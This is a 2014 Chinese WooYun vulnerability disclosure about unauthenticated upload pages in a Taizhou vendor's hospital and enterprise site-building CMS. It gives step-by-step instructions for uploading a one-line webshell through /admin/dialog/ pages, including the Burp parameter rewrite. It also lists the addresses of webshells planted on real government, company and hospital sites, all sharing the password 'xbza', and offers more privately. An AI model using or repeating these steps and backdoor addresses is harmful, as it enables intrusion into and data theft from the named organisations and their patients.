当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081663

漏洞标题:某公司通用医院、企业两套建站系统未授权访问,已getshell,官网200+案例

相关厂商:台州华顶网络技术有限公司

漏洞作者: 小饼仔

提交时间:2014-11-04 15:39

修复时间:2015-02-02 15:40

公开时间:2015-02-02 15:40

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

200+案例,还走小厂商吗?

详细说明:

刚发了一个该公司医院建站系统登陆后台SQL注入的洞
审核链接:http://www.wooyun.org/bugs/wooyun-2014-081643/trace/4396818394b9b59fdfdd9a1da75a1883
标题是:某通用医院建站系统登入后台SQL注入,已getshell
里面说的是医院案例,拿到了shell,菜刀连接后,研究了下,发现admin/dialog下的文件存在未授权,其实就是网站上上传功能所存放的地方。

15.png


链接为:公司网址/admin/dialog/(里面任意一个文件都可以)
比如:
/admin/dialog/filelist.aspx
/admin/dialog/fileupload.aspx
/admin/dialog/piclist.aspx
等等
官网上显示的医院案例33个,感觉拿这个再发一个好像不太合适,所以决定再去试试公司案例是不是也有未授权访问,一看不得了,189个案例,加上医院的,200+了,这个单独发个就合适了。

16.png


这里选择一个公司案例和一个医院案例来做说明,其他案例同理
未授权访问页面有很多,这里选择/admin/dialog/filelist.aspx为例来说明,其他未具体测试,估计都可以
公司案例:
台州政研网 http://www.tzzy.gov.cn/
1. 输入 网址+/admin/dialog/filelist.aspx
这里为http://www.tzzy.gov.cn/admin/dialog/filelist.aspx

21.png


2.点击浏览,选择一句话shell,然后点击文件上传,这里需要burp拦截请求,替换url后的参数为Show=true&path=admin/dialog

22.png


然后页面会列出admin/dialog下面的文件,即一句话shell上传的目录

23.png


因此,一句话地址即为
http://www.tzzy.gov.cn/admin/dialog/201411010646941.aspx 密码:xbza
菜刀连接

24.png


公司案例补充一句话地址,证明通用性,密码均为xbza :
http://www.tzyuanlin.com//admin/dialog/201411010605117.aspx
http://www.zjgengu.com//admin/dialog/201411010609374.aspx
http://www.wljgw.com//admin/dialog/201411010619683.aspx
http://www.tzbfh.com//admin/dialog/201411010619757.aspx
http://www.dhy.cn//admin/dialog/201411010623431.aspx
http://tzwomen.tzdsw.cn/admin/dialog/201411010625816.aspx
...
不够私信
医院案例:
浙江省衢州市人民医院 http://www.qzhospital.com
1. 输入http://www.qzhospital.com/admin/dialog/filelist.aspx

25.png


2. 点击浏览,选择一句话shell,然后点击文件上传,这里需要burp拦截请求,替换url后的参数为Show=true&path=admin/dialog

26.png


27.png

28.png

29.png


一句话地址:http://www.qzhospital.com//admin/dialog/201411010706103.aspx 密码:xbza

30.png


医院案例补充一句话地址,证明通用性,密码均为xbza :
http://www.lhsfby.com//admin/dialog/20141101072280.aspx
http://www.tzlqey.com//admin/dialog/20141101072330.aspx
...
不够私信

漏洞证明:

修复方案:

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝